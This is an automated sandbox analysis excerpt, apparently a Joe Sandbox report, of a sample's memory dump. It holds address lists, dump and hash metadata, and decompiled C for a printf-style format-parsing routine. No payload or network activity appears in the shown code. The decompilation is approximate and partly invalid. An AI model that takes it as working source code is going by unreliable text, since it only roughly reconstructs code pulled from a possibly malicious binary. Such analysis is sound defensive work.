                                                                                                                            				return E0000025B25BF8A81A50(_t261, _t402,  *(_t467 + 0x1a20) ^ _t470, _t497, _t454,  &(_t462[0]) - _t467 + 0x620, _t467, _t484);
                                                                                                                            			}
                                                                                                                            0x25bf8a8025a
                                                                                                                            0x25bf8a8025d
                                                                                                                            0x25bf8a80265
                                                                                                                            0x25bf8a8026d
                                                                                                                            0x25bf8a80272
                                                                                                                            0x25bf8a80278
                                                                                                                            0x25bf8a8027e
                                                                                                                            0x25bf8a80282
                                                                                                                            0x25bf8a80285
                                                                                                                            0x25bf8a8028c
                                                                                                                            0x25bf8a80295
                                                                                                                            0x25bf8a8029b
                                                                                                                            0x25bf8a802a5
                                                                                                                            0x25bf8a802b0
                                                                                                                            0x25bf8a802ba
                                                                                                                            0x25bf8a802c1
                                                                                                                            0x25bf8a802c5
                                                                                                                            0x25bf8a802cb
                                                                                                                            0x25bf8a802cf
                                                                                                                            0x25bf8a802da
                                                                                                                            0x25bf8a802e6
                                                                                                                            0x25bf8a802f5
                                                                                                                            0x25bf8a80300
                                                                                                                            0x25bf8a80311
                                                                                                                            0x25bf8a8031a
                                                                                                                            0x25bf8a8031c
                                                                                                                            0x25bf8a80332
                                                                                                                            0x25bf8a80338
                                                                                                                            0x25bf8a8033e
                                                                                                                            0x25bf8a80352
                                                                                                                            0x25bf8a8035a
                                                                                                                            0x25bf8a80362
                                                                                                                            0x25bf8a80365
                                                                                                                            0x25bf8a8036a
                                                                                                                            0x25bf8a80370
                                                                                                                            0x25bf8a80375
                                                                                                                            0x25bf8a80380
                                                                                                                            0x25bf8a8039f
                                                                                                                            0x25bf8a803aa
                                                                                                                            0x25bf8a803be
                                                                                                                            0x25bf8a803ce
                                                                                                                            0x25bf8a803d4
                                                                                                                            0x25bf8a803e1
                                                                                                                            0x25bf8a803f8
                                                                                                                            0x25bf8a80406
                                                                                                                            0x25bf8a80411
                                                                                                                            0x25bf8a80417
                                                                                                                            0x25bf8a8041d
                                                                                                                            0x25bf8a80424
                                                                                                                            0x25bf8a80426
                                                                                                                            0x25bf8a80429
                                                                                                                            0x25bf8a80430
                                                                                                                            0x25bf8a80435
                                                                                                                            0x25bf8a80439
                                                                                                                            0x25bf8a8043d
                                                                                                                            0x25bf8a80442
                                                                                                                            0x25bf8a80444
                                                                                                                            0x25bf8a8044e
                                                                                                                            0x25bf8a8045f
                                                                                                                            0x25bf8a8046b
                                                                                                                            0x25bf8a80474
                                                                                                                            0x25bf8a80483
                                                                                                                            0x25bf8a8048b
                                                                                                                            0x25bf8a8048f
                                                                                                                            0x25bf8a8049c
                                                                                                                            0x25bf8a8049e
                                                                                                                            0x25bf8a804b2
                                                                                                                            0x25bf8a804bb
                                                                                                                            0x25bf8a804c8
                                                                                                                            0x25bf8a804d1
                                                                                                                            0x25bf8a804dd
                                                                                                                            0x25bf8a804e7
                                                                                                                            0x25bf8a804ef
                                                                                                                            0x25bf8a804f2
                                                                                                                            0x25bf8a804f9
                                                                                                                            0x25bf8a80502
                                                                                                                            0x25bf8a80508
                                                                                                                            0x25bf8a8050f
                                                                                                                            0x25bf8a80521
                                                                                                                            0x25bf8a80523
                                                                                                                            0x25bf8a80527
                                                                                                                            0x25bf8a8052c
                                                                                                                            0x25bf8a8052e
                                                                                                                            0x25bf8a80532
                                                                                                                            0x25bf8a8053b
                                                                                                                            0x25bf8a80547
                                                                                                                            0x25bf8a80549
                                                                                                                            0x25bf8a80556
                                                                                                                            0x25bf8a80559
                                                                                                                            0x25bf8a8057c
                                                                                                                            0x25bf8a8058c
                                                                                                                            0x25bf8a805a8
                                                                                                                            0x25bf8a805bc
                                                                                                                            0x25bf8a805c2
                                                                                                                            0x25bf8a805cb
                                                                                                                            0x25bf8a805d4
                                                                                                                            0x25bf8a805e3
                                                                                                                            0x25bf8a805f5
                                                                                                                            0x25bf8a805f7
                                                                                                                            0x25bf8a80604
                                                                                                                            0x25bf8a80606
                                                                                                                            0x25bf8a8060c
                                                                                                                            0x25bf8a80618
                                                                                                                            0x25bf8a80626
                                                                                                                            0x25bf8a80628
                                                                                                                            0x25bf8a80635
                                                                                                                            0x25bf8a80638
                                                                                                                            0x25bf8a8065b
                                                                                                                            0x25bf8a8066b
                                                                                                                            0x25bf8a80687
                                                                                                                            0x25bf8a8069b
                                                                                                                            0x25bf8a806a1
                                                                                                                            0x25bf8a806a9
                                                                                                                            0x25bf8a806af
                                                                                                                            0x25bf8a806b5
                                                                                                                            0x25bf8a806c5
                                                                                                                            0x25bf8a806c7
                                                                                                                            0x25bf8a806d4
                                                                                                                            0x25bf8a806d6
                                                                                                                            0x25bf8a806e6
                                                                                                                            0x25bf8a806f4
                                                                                                                            0x25bf8a806f6
                                                                                                                            0x25bf8a806fc
                                                                                                                            0x25bf8a8070e
                                                                                                                            0x25bf8a8071d
                                                                                                                            0x25bf8a80724
                                                                                                                            0x25bf8a8072e
                                                                                                                            0x25bf8a80733
                                                                                                                            0x25bf8a80739
                                                                                                                            0x25bf8a8073f
                                                                                                                            0x25bf8a80747
                                                                                                                            0x25bf8a8074d
                                                                                                                            0x25bf8a80750
                                                                                                                            0x25bf8a8076e
                                                                                                                            0x25bf8a80781
                                                                                                                            0x25bf8a80783
                                                                                                                            0x25bf8a8078d
                                                                                                                            0x25bf8a8078f
                                                                                                                            0x25bf8a80791
                                                                                                                            0x25bf8a8079f
                                                                                                                            0x25bf8a807a4
                                                                                                                            0x25bf8a807b0
                                                                                                                            0x25bf8a807b6
                                                                                                                            0x25bf8a807bc
                                                                                                                            0x25bf8a807c6
                                                                                                                            0x25bf8a807cc
                                                                                                                            0x25bf8a807d4
                                                                                                                            0x25bf8a807dc
                                                                                                                            0x25bf8a807de
                                                                                                                            0x25bf8a807e4
                                                                                                                            0x25bf8a807e8
                                                                                                                            0x25bf8a807ec
                                                                                                                            0x25bf8a807f1
                                                                                                                            0x25bf8a807f3
                                                                                                                            0x25bf8a807f8
                                                                                                                            0x25bf8a807fe
                                                                                                                            0x25bf8a80803
                                                                                                                            0x25bf8a80805
                                                                                                                            0x25bf8a8080c
                                                                                                                            0x25bf8a80811
                                                                                                                            0x25bf8a80822
                                                                                                                            0x25bf8a8082c
                                                                                                                            0x25bf8a80832
                                                                                                                            0x25bf8a80838
                                                                                                                            0x25bf8a8083d
                                                                                                                            0x25bf8a80843
                                                                                                                            0x25bf8a80848
                                                                                                                            0x25bf8a8084b
                                                                                                                            0x25bf8a8087f

                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708356136.0000025BF8A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8a60000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: __doserrno_errno_invalid_parameter_noinfo
                                                                                                                            • String ID: U
                                                                                                                            • API String ID: 3902385426-4171548499
                                                                                                                            • Opcode ID: f5253bed9487a14fdae6fa9298568b7ed63ecb77f3cc5c6eee4d39586fcadd6e
                                                                                                                            • Instruction ID: 82313c937c52639eae01ad825c33fb2dee4c3f04916f3aadd54390b2923e3336
                                                                                                                            • Opcode Fuzzy Hash: f5253bed9487a14fdae6fa9298568b7ed63ecb77f3cc5c6eee4d39586fcadd6e
                                                                                                                            • Instruction Fuzzy Hash: 1C12E433214E4186EF228F25EC483AEB7A0F795766F604116FA8943ED5DB39C455CB38
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            C-Code - Quality: 43%
                                                                                                                            			_entry_(void* __ebx, void* __edx, void* __r9, long long __r10, void* __r11, signed int __r12, intOrPtr* __r13) {
                                                                                                                            				void* _t177;
                                                                                                                            				void* _t178;
                                                                                                                            				void* _t181;
                                                                                                                            				void* _t185;
                                                                                                                            				void* _t188;
                                                                                                                            				char _t189;
                                                                                                                            				signed int _t190;
                                                                                                                            				void* _t194;
                                                                                                                            				signed int _t195;
                                                                                                                            				void* _t199;
                                                                                                                            				signed int _t200;
                                                                                                                            				signed int _t205;
                                                                                                                            				signed int _t211;
                                                                                                                            				void* _t217;
                                                                                                                            				signed int _t232;
                                                                                                                            				signed int _t247;
                                                                                                                            				void* _t259;
                                                                                                                            				signed int _t265;
                                                                                                                            				signed int _t267;
                                                                                                                            				signed int _t273;
                                                                                                                            				void* _t274;
                                                                                                                            				intOrPtr _t284;
                                                                                                                            				signed int _t311;
                                                                                                                            				signed int _t317;
                                                                                                                            				void* _t325;
                                                                                                                            				char* _t329;
                                                                                                                            				signed int _t335;
                                                                                                                            				void* _t359;
                                                                                                                            				intOrPtr _t374;
                                                                                                                            				char* _t378;
                                                                                                                            				long long* _t379;
                                                                                                                            				signed long long _t383;
                                                                                                                            				intOrPtr _t386;
                                                                                                                            				void* _t389;
                                                                                                                            				char* _t391;
                                                                                                                            				char* _t393;
                                                                                                                            				char* _t395;
                                                                                                                            				signed short* _t396;
                                                                                                                            				signed long long _t398;
                                                                                                                            				void* _t399;
                                                                                                                            				intOrPtr* _t400;
                                                                                                                            				void* _t426;
                                                                                                                            				signed int* _t434;
                                                                                                                            				signed int* _t435;
                                                                                                                            				signed int* _t436;
                                                                                                                            				signed int* _t437;
                                                                                                                            				void* _t441;
                                                                                                                            				void* _t444;
                                                                                                                            				signed long long _t446;
                                                                                                                            				signed long long _t451;
                                                                                                                            				intOrPtr* _t476;
                                                                                                                            				intOrPtr* _t478;
                                                                                                                            				long long _t481;
                                                                                                                            				intOrPtr* _t482;
                                                                                                                            				signed int* _t483;
                                                                                                                            
                                                                                                                            				asm("por mm0, [ebx]");
                                                                                                                            				_t398 = r10d;
                                                                                                                            				_t247 =  *(__edx + _t398 * 8 + __r9 + 0x2e520) >> 4;
                                                                                                                            				 *(_t446 + 0x58) = _t247;
                                                                                                                            				_t273 = _t247;
                                                                                                                            				if (_t273 == 0) goto 0xf8a7c9e1;
                                                                                                                            				if (_t273 == 0) goto 0xf8a7cafb;
                                                                                                                            				if (_t273 == 0) goto 0xf8a7caab;
                                                                                                                            				if (_t273 == 0) goto 0xf8a7ca6f;
                                                                                                                            				if (_t273 == 0) goto 0xf8a7ca67;
                                                                                                                            				if (_t273 == 0) goto 0xf8a7ca32;
                                                                                                                            				if (_t273 == 0) goto 0xf8a7c957;
                                                                                                                            				if (_t273 != 0) goto 0xf8a7c942;
                                                                                                                            				_t232 = r15b;
                                                                                                                            				_t274 = _t232 - 0x64;
                                                                                                                            				if (_t274 > 0) goto 0xf8a7c4a4;
                                                                                                                            				if (_t274 == 0) goto 0xf8a7c5a5;
                                                                                                                            				if (_t232 == 0x41) goto 0xf8a7c479;
                                                                                                                            				if (_t232 == 0x43) goto 0xf8a7c41f;
                                                                                                                            				if ((_t398 - 0x00000045 & 0xfffffffd) == 0) goto 0xf8a7c479;
                                                                                                                            				if (_t232 == 0x53) goto 0xf8a7c3d3;
                                                                                                                            				if (_t232 == 0x58) goto 0xf8a7c53e;
                                                                                                                            				if (_t232 == 0x5a) goto 0xf8a7c38b;
                                                                                                                            				if (_t232 == 0x61) goto 0xf8a7c485;
                                                                                                                            				if (_t232 == 0x63) goto 0xf8a7c42d;
                                                                                                                            				goto 0xf8a7c7b0;
                                                                                                                            				_t374 =  *__r13;
                                                                                                                            				_t476 = __r13 + 8;
                                                                                                                            				if (_t374 == 0) goto 0xf8a7c3c7;
                                                                                                                            				_t284 =  *((intOrPtr*)(_t374 + 8));
                                                                                                                            				if (_t284 == 0) goto 0xf8a7c3c7;
                                                                                                                            				asm("inc ecx");
                                                                                                                            				if (_t284 >= 0) goto 0xf8a7c3bd;
                                                                                                                            				asm("cdq");
                                                                                                                            				 *(_t446 + 0x50) = 1;
                                                                                                                            				goto 0xf8a7c7ac;
                                                                                                                            				 *(_t446 + 0x50) = r10d;
                                                                                                                            				goto 0xf8a7c7ac;
                                                                                                                            				goto 0xf8a7c7a1;
                                                                                                                            				if ((r14d & 0x00000830) != 0) goto 0xf8a7c3e1;
                                                                                                                            				asm("inc ecx");
                                                                                                                            				_t386 =  *_t476;
                                                                                                                            				_t177 =  ==  ? 0x7fffffff : r12d;
                                                                                                                            				if ((r14d & 0x00000810) == 0) goto 0xf8a7c50a;
                                                                                                                            				 *(_t446 + 0x50) = 1;
                                                                                                                            				_t387 =  ==  ?  *0xf8a9c5c0 : _t386;
                                                                                                                            				_t399 =  ==  ?  *0xf8a9c5c0 : _t386;
                                                                                                                            				goto 0xf8a7c4fe;
                                                                                                                            				if ((r14d & 0x00000830) != 0) goto 0xf8a7c42d;
                                                                                                                            				asm("inc ecx");
                                                                                                                            				_t478 = _t476 + 0x10;
                                                                                                                            				if ((r14d & 0x00000810) == 0) goto 0xf8a7c461;
                                                                                                                            				r9d =  *(_t478 - 8) & 0x0000ffff;
                                                                                                                            				_t426 = _t444 - 0x30;
                                                                                                                            				_t400 = _t446 + 0x44;
                                                                                                                            				_t178 = E0000025B25BF8A833AC();
                                                                                                                            				r10d = 0;
                                                                                                                            				if (_t178 == 0) goto 0xf8a7c470;
                                                                                                                            				 *(_t446 + 0x5c) = 1;
                                                                                                                            				goto 0xf8a7c470;
                                                                                                                            				 *(_t446 + 0x44) = 1;
                                                                                                                            				 *((char*)(_t444 - 0x30)) =  *(_t478 - 8);
                                                                                                                            				goto 0xf8a7c7b0;
                                                                                                                            				 *(_t446 + 0x78) = 1;
                                                                                                                            				r15b = r15b + 0x20;
                                                                                                                            				r14d = r14d | 0x00000040;
                                                                                                                            				_t389 = _t444 - 0x30;
                                                                                                                            				_t267 = r11d;
                                                                                                                            				if (r12d >= 0) goto 0xf8a7c6c3;
                                                                                                                            				r12d = 6;
                                                                                                                            				goto 0xf8a7c709;
                                                                                                                            				if (0x7fffffff - 0x65 < 0) goto 0xf8a7c7b0;
                                                                                                                            				if (0x7fffffff - 0x67 <= 0) goto 0xf8a7c485;
                                                                                                                            				if (0x7fffffff == 0x69) goto 0xf8a7c5a5;
                                                                                                                            				if (0x7fffffff == 0x6e) goto 0xf8a7c573;
                                                                                                                            				if (0x7fffffff == 0x6f) goto 0xf8a7c563;
                                                                                                                            				if (0x7fffffff == 0x70) goto 0xf8a7c533;
                                                                                                                            				if (0x7fffffff == 0x73) goto 0xf8a7c3e1;
                                                                                                                            				if (0x7fffffff == 0x75) goto 0xf8a7c5a9;
                                                                                                                            				if (0x7fffffff != 0x78) goto 0xf8a7c7b0;
                                                                                                                            				goto 0xf8a7c543;
                                                                                                                            				_t181 = _t400 - 0x50;
                                                                                                                            				if ( *_t400 == r10w) goto 0xf8a7c502;
                                                                                                                            				if (_t181 != 0) goto 0xf8a7c4f2;
                                                                                                                            				goto 0xf8a7c52a;
                                                                                                                            				_t390 =  ==  ?  *0xf8a9c5b8 : _t389;
                                                                                                                            				_t404 =  ==  ?  *0xf8a9c5b8 : _t389;
                                                                                                                            				goto 0xf8a7c524;
                                                                                                                            				if ( *((intOrPtr*)( ==  ?  *0xf8a9c5b8 : _t389)) == r10b) goto 0xf8a7c528;
                                                                                                                            				if (_t181 - 1 != 0) goto 0xf8a7c51a;
                                                                                                                            				 *(_t446 + 0x44) = 0x7fffffff;
                                                                                                                            				goto 0xf8a7c7b0;
                                                                                                                            				r12d = 0x10;
                                                                                                                            				asm("inc ecx");
                                                                                                                            				 *((intOrPtr*)(_t446 + 0x60)) = 7;
                                                                                                                            				r9d = 0x10;
                                                                                                                            				if (r14b >= 0) goto 0xf8a7c5af;
                                                                                                                            				 *((char*)(_t446 + 0x4c)) = 0x30;
                                                                                                                            				 *((char*)(_t446 + 0x4d)) = 0x58;
                                                                                                                            				goto 0xf8a7c5b3;
                                                                                                                            				r9d = 8;
                                                                                                                            				if (r14b >= 0) goto 0xf8a7c5af;
                                                                                                                            				r14d = r14d | r11d;
                                                                                                                            				goto 0xf8a7c5af;
                                                                                                                            				_t434 =  *_t478;
                                                                                                                            				_t185 = E0000025B25BF8A79CA0();
                                                                                                                            				r10d = 0;
                                                                                                                            				if (_t185 == 0) goto 0xf8a7cb1f;
                                                                                                                            				if ((r14b & 0x00000020) == 0) goto 0xf8a7c596;
                                                                                                                            				 *_t434 = _t267;
                                                                                                                            				goto 0xf8a7c598;
                                                                                                                            				 *_t434 = _t267;
                                                                                                                            				 *(_t446 + 0x5c) = 1;
                                                                                                                            				goto 0xf8a7c911;
                                                                                                                            				r14d = r14d | 0x00000040;
                                                                                                                            				r9d = 0xa;
                                                                                                                            				_t311 = 0x00008000 & r14d;
                                                                                                                            				if (_t311 == 0) goto 0xf8a7c5c7;
                                                                                                                            				goto 0xf8a7c601;
                                                                                                                            				asm("inc ecx");
                                                                                                                            				if (_t311 < 0) goto 0xf8a7c5bd;
                                                                                                                            				_t481 = _t478 + 0x18;
                                                                                                                            				if ((r14b & 0x00000020) == 0) goto 0xf8a7c5f1;
                                                                                                                            				 *((long long*)(_t446 + 0x70)) = _t481;
                                                                                                                            				if ((r14b & 0x00000040) == 0) goto 0xf8a7c5ea;
                                                                                                                            				goto 0xf8a7c606;
                                                                                                                            				r8d =  *(_t481 - 8) & 0x0000ffff;
                                                                                                                            				goto 0xf8a7c606;
                                                                                                                            				if ((r14b & 0x00000040) == 0) goto 0xf8a7c5fd;
                                                                                                                            				_t451 =  *(_t481 - 8);
                                                                                                                            				goto 0xf8a7c601;
                                                                                                                            				r8d =  *(_t481 - 8);
                                                                                                                            				 *((long long*)(_t446 + 0x70)) = _t481;
                                                                                                                            				if ((r14b & 0x00000040) == 0) goto 0xf8a7c619;
                                                                                                                            				if (_t451 >= 0) goto 0xf8a7c619;
                                                                                                                            				asm("inc ecx");
                                                                                                                            				_t317 = 0x00008000 & r14d;
                                                                                                                            				if (_t317 != 0) goto 0xf8a7c628;
                                                                                                                            				asm("inc ecx");
                                                                                                                            				if (_t317 < 0) goto 0xf8a7c628;
                                                                                                                            				if (r12d >= 0) goto 0xf8a7c635;
                                                                                                                            				r12d = 1;
                                                                                                                            				goto 0xf8a7c640;
                                                                                                                            				r14d = r14d & 0xfffffff7;
                                                                                                                            				r12d =  >  ? r11d : r12d;
                                                                                                                            				r13d =  *((intOrPtr*)(_t446 + 0x60));
                                                                                                                            				_t391 = _t444 + 0x1cf;
                                                                                                                            				asm("sbb ecx, ecx");
                                                                                                                            				 *(_t446 + 0x48) = 0x7fffffff - __ebx &  *(_t446 + 0x48);
                                                                                                                            				r12d = r12d - 1;
                                                                                                                            				if (r12d > 0) goto 0xf8a7c669;
                                                                                                                            				if ( ~_t451 == 0) goto 0xf8a7c689;
                                                                                                                            				_t66 = _t426 + 0x30; // 0x30
                                                                                                                            				_t188 = _t66;
                                                                                                                            				if (_t188 - 0x39 <= 0) goto 0xf8a7c682;
                                                                                                                            				_t189 = _t188 + r13d;
                                                                                                                            				 *_t391 = _t189;
                                                                                                                            				goto 0xf8a7c65a;
                                                                                                                            				_t482 =  *((intOrPtr*)(_t446 + 0x70));
                                                                                                                            				_t378 = _t444 + 0x1cf;
                                                                                                                            				_t190 = _t189 - __ebx;
                                                                                                                            				_t393 = _t391 - 1 + 1;
                                                                                                                            				 *(_t446 + 0x44) = _t190;
                                                                                                                            				if ((r11d & r14d) == 0) goto 0xf8a7c7b0;
                                                                                                                            				if (_t190 == 0) goto 0xf8a7c6b4;
                                                                                                                            				_t325 =  *_t393 - 0x30;
                                                                                                                            				if (_t325 == 0) goto 0xf8a7c7b0;
                                                                                                                            				 *(_t446 + 0x44) =  *(_t446 + 0x44) + 1;
                                                                                                                            				 *((char*)(_t393 - 1)) = 0x30;
                                                                                                                            				goto 0xf8a7c7b0;
                                                                                                                            				if (_t325 != 0) goto 0xf8a7c6d3;
                                                                                                                            				if (r15b != 0x67) goto 0xf8a7c709;
                                                                                                                            				r12d = 1;
                                                                                                                            				goto 0xf8a7c709;
                                                                                                                            				r12d =  >  ? r11d : r12d;
                                                                                                                            				if (r12d - 0xa3 <= 0) goto 0xf8a7c709;
                                                                                                                            				_t259 = __r12 + 0x15d;
                                                                                                                            				E0000025B25BF8A7E798(_t393 - 1, _t259, _t434, _t441, _t444);
                                                                                                                            				 *((long long*)(_t444 - 0x80)) = _t378;
                                                                                                                            				_t329 = _t378;
                                                                                                                            				if (_t329 == 0) goto 0xf8a7c703;
                                                                                                                            				_t395 = _t378;
                                                                                                                            				goto 0xf8a7c709;
                                                                                                                            				r12d = 0xa3;
                                                                                                                            				_t379 =  *_t482;
                                                                                                                            				_t483 = _t482 + 8;
                                                                                                                            				_t442 = _t259;
                                                                                                                            				 *((long long*)(_t444 - 0x60)) = _t379;
                                                                                                                            				"%d\t%d\t%s\n"();
                                                                                                                            				r9d = r15b;
                                                                                                                            				 *((long long*)(_t446 + 0x30)) = _t444 - 0x58;
                                                                                                                            				 *(_t446 + 0x28) =  *(_t446 + 0x78);
                                                                                                                            				 *(_t446 + 0x20) = r12d;
                                                                                                                            				 *_t379();
                                                                                                                            				if (_t329 == 0) goto 0xf8a7c774;
                                                                                                                            				if (r12d != 0) goto 0xf8a7c774;
                                                                                                                            				"%d\t%d\t%s\n"();
                                                                                                                            				 *_t379();
                                                                                                                            				if (r15b != 0x67) goto 0xf8a7c794;
                                                                                                                            				if ((r14d & 0x00000080) != 0) goto 0xf8a7c794;
                                                                                                                            				"%d\t%d\t%s\n"();
                                                                                                                            				_t194 =  *_t379();
                                                                                                                            				if ( *_t395 != 0x2d) goto 0xf8a7c7a1;
                                                                                                                            				asm("inc ecx");
                                                                                                                            				_t396 = _t395 + 1;
                                                                                                                            				_t195 = E0000025B25BF8A82800(_t194, _t396);
                                                                                                                            				r10d = 0;
                                                                                                                            				 *(_t446 + 0x44) = _t195;
                                                                                                                            				if ( *(_t446 + 0x5c) != r10d) goto 0xf8a7c911;
                                                                                                                            				_t335 = r14b & 0x00000040;
                                                                                                                            				if (_t335 == 0) goto 0xf8a7c7f2;
                                                                                                                            				asm("inc ecx");
                                                                                                                            				if (_t335 >= 0) goto 0xf8a7c7cf;
                                                                                                                            				 *((char*)(_t446 + 0x4c)) = 0x2d;
                                                                                                                            				goto 0xf8a7c7da;
                                                                                                                            				if ((r14b & 0x00000001) == 0) goto 0xf8a7c7e5;
                                                                                                                            				 *((char*)(_t446 + 0x4c)) = 0x2b;
                                                                                                                            				 *(_t446 + 0x48) = 1;
                                                                                                                            				goto 0xf8a7c7f6;
                                                                                                                            				if ((r14b & 0x00000002) == 0) goto 0xf8a7c7f2;
                                                                                                                            				 *((char*)(_t446 + 0x4c)) = 0x20;
                                                                                                                            				goto 0xf8a7c7da;
                                                                                                                            				if ((r14b & 0x0000000c) != 0) goto 0xf8a7c81c;
                                                                                                                            				E0000025B25BF8A7CBBC(0x20,  *(_t446 + 0x54) -  *(_t446 + 0x44) -  *(_t446 + 0x48), _t396, _t259, _t444,  *((intOrPtr*)(_t446 + 0x68)), _t446 + 0x40);
                                                                                                                            				 *(_t446 + 0x20) =  *((intOrPtr*)(_t444 - 0x70));
                                                                                                                            				E0000025B25BF8A7D648( *(_t446 + 0x48), _t396, _t446 + 0x4c, _t259, _t444,  *((intOrPtr*)(_t446 + 0x68)), _t446 + 0x40);
                                                                                                                            				if ((r14b & 0x00000008) == 0) goto 0xf8a7c856;
                                                                                                                            				if ((r14b & 0x00000004) != 0) goto 0xf8a7c856;
                                                                                                                            				E0000025B25BF8A7CBBC(0x30,  *(_t446 + 0x54) -  *(_t446 + 0x44) -  *(_t446 + 0x48), _t396, _t259, _t444,  *((intOrPtr*)(_t446 + 0x68)), _t446 + 0x40);
                                                                                                                            				_t265 =  *(_t446 + 0x44);
                                                                                                                            				if ( *(_t446 + 0x50) == 0) goto 0xf8a7c8d1;
                                                                                                                            				if (_t265 <= 0) goto 0xf8a7c8d1;
                                                                                                                            				r9d =  *_t396 & 0x0000ffff;
                                                                                                                            				r8d = 6;
                                                                                                                            				_t199 = E0000025B25BF8A833AC();
                                                                                                                            				r10d = 0;
                                                                                                                            				if (_t199 != 0) goto 0xf8a7c8c3;
                                                                                                                            				if ( *((intOrPtr*)(_t444 - 0x78)) == 0) goto 0xf8a7c8c3;
                                                                                                                            				 *(_t446 + 0x20) =  *((intOrPtr*)(_t444 - 0x70));
                                                                                                                            				_t200 = E0000025B25BF8A7D648( *((intOrPtr*)(_t444 - 0x78)), _t396, _t444 + 0x1d0, _t259, _t444,  *((intOrPtr*)(_t446 + 0x68)), _t446 + 0x40);
                                                                                                                            				r10d = 0;
                                                                                                                            				if (_t265 - 1 != 0) goto 0xf8a7c868;
                                                                                                                            				goto 0xf8a7c8ef;
                                                                                                                            				 *(_t446 + 0x40) = _t200 | 0xffffffff;
                                                                                                                            				goto 0xf8a7c8f3;
                                                                                                                            				 *(_t446 + 0x20) =  *((intOrPtr*)(_t444 - 0x70));
                                                                                                                            				E0000025B25BF8A7D648(_t265 - 1, _t396, _t396, _t259, _t444,  *((intOrPtr*)(_t446 + 0x68)), _t446 + 0x40);
                                                                                                                            				r10d = 0;
                                                                                                                            				if ( *(_t446 + 0x40) < 0) goto 0xf8a7c911;
                                                                                                                            				if ((r14b & 0x00000004) == 0) goto 0xf8a7c911;
                                                                                                                            				E0000025B25BF8A7CBBC(0x20,  *(_t446 + 0x54) -  *(_t446 + 0x44) -  *(_t446 + 0x48), _t396, _t442, _t444,  *((intOrPtr*)(_t446 + 0x68)), _t446 + 0x40);
                                                                                                                            				r10d = 0;
                                                                                                                            				_t383 =  *((intOrPtr*)(_t444 - 0x80));
                                                                                                                            				if (_t383 == 0) goto 0xf8a7c929;
                                                                                                                            				free(??);
                                                                                                                            				r10d = 0;
                                                                                                                            				 *((long long*)(_t444 - 0x80)) = __r10;
                                                                                                                            				_t435 =  *((intOrPtr*)(_t444 - 0x68));
                                                                                                                            				r11d = 0x200;
                                                                                                                            				r15b =  *_t435;
                                                                                                                            				if (r15b == 0) goto 0xf8a7cb37;
                                                                                                                            				r8d = r8d | 0xffffffff;
                                                                                                                            				goto 0xf8a7c2a6;
                                                                                                                            				if (r15b == 0x49) goto 0xf8a7c991;
                                                                                                                            				if (r15b == 0x68) goto 0xf8a7c98b;
                                                                                                                            				if (r15b == 0x6c) goto 0xf8a7c976;
                                                                                                                            				if (r15b != 0x77) goto 0xf8a7c942;
                                                                                                                            				asm("inc ecx");
                                                                                                                            				goto 0xf8a7c942;
                                                                                                                            				if ( *_t435 != 0x6c) goto 0xf8a7c985;
                                                                                                                            				_t436 =  &(_t435[0]);
                                                                                                                            				asm("inc ecx");
                                                                                                                            				goto 0xf8a7c942;
                                                                                                                            				r14d = r14d | 0x00000010;
                                                                                                                            				goto 0xf8a7c942;
                                                                                                                            				r14d = r14d | 0x00000020;
                                                                                                                            				goto 0xf8a7c942;
                                                                                                                            				_t205 =  *_t436;
                                                                                                                            				asm("inc ecx");
                                                                                                                            				if (_t205 != 0x36) goto 0xf8a7c9ad;
                                                                                                                            				if (_t436[0] != 0x34) goto 0xf8a7c9ad;
                                                                                                                            				_t437 =  &(_t436[0]);
                                                                                                                            				asm("inc ecx");
                                                                                                                            				goto 0xf8a7c942;
                                                                                                                            				if (_t205 != 0x33) goto 0xf8a7c9c2;
                                                                                                                            				if (_t437[0] != 0x32) goto 0xf8a7c9c2;
                                                                                                                            				asm("inc ecx");
                                                                                                                            				goto 0xf8a7c942;
                                                                                                                            				_t359 = _t205 - 0x58 - 0x20;
                                                                                                                            				if (_t359 > 0) goto 0xf8a7c9dc;
                                                                                                                            				asm("dec eax");
                                                                                                                            				if (_t359 < 0) goto 0xf8a7c942;
                                                                                                                            				 *(_t446 + 0x58) = r10d;
                                                                                                                            				 *(_t446 + 0x50) = r10d;
                                                                                                                            				if (E0000025B25BF8A83194(r15b & 0xffffffff, _t359, _t383, _t444 - 0x58) == 0) goto 0xf8a7ca18;
                                                                                                                            				E0000025B25BF8A7CB74(r15b,  *((intOrPtr*)(_t446 + 0x68)), _t446 + 0x40);
                                                                                                                            				r15b = _t437[0];
                                                                                                                            				if (r15b == 0) goto 0xf8a7cb1f;
                                                                                                                            				E0000025B25BF8A7CB74(r15b,  *((intOrPtr*)(_t446 + 0x68)), _t446 + 0x40);
                                                                                                                            				r10d = 0;
                                                                                                                            				goto 0xf8a7c92d;
                                                                                                                            				if (r15b != 0x2a) goto 0xf8a7ca51;
                                                                                                                            				r12d =  *_t483;
                                                                                                                            				if (r12d >= 0) goto 0xf8a7c942;
                                                                                                                            				r12d = r8d;
                                                                                                                            				goto 0xf8a7c942;
                                                                                                                            				r12d = __r12 + __r12 * 4;
                                                                                                                            				r12d = __r12 - 0x18;
                                                                                                                            				r12d = _t383 + __r12 * 2;
                                                                                                                            				goto 0xf8a7c942;
                                                                                                                            				r12d = r10d;
                                                                                                                            				goto 0xf8a7c942;
                                                                                                                            				if (r15b != 0x2a) goto 0xf8a7ca91;
                                                                                                                            				_t211 = _t483[2];
                                                                                                                            				 *(_t446 + 0x54) = _t211;
                                                                                                                            				if (_t211 >= 0) goto 0xf8a7c942;
                                                                                                                            				r14d = r14d | 0x00000004;
                                                                                                                            				goto 0xf8a7caa2;
                                                                                                                            				 *(_t446 + 0x54) = _t383 + 0x341041fd2;
                                                                                                                            				goto 0xf8a7c942;
                                                                                                                            				if (r15b == 0x20) goto 0xf8a7caf2;
                                                                                                                            				if (r15b == 0x23) goto 0xf8a7cae8;
                                                                                                                            				if (r15b == 0x2b) goto 0xf8a7cadf;
                                                                                                                            				if (r15b == 0x2d) goto 0xf8a7cad6;
                                                                                                                            				if (r15b != 0x30) goto 0xf8a7c942;
                                                                                                                            				r14d = r14d | 0x00000008;
                                                                                                                            				goto 0xf8a7c942;
                                                                                                                            				r14d = r14d | 0x00000004;
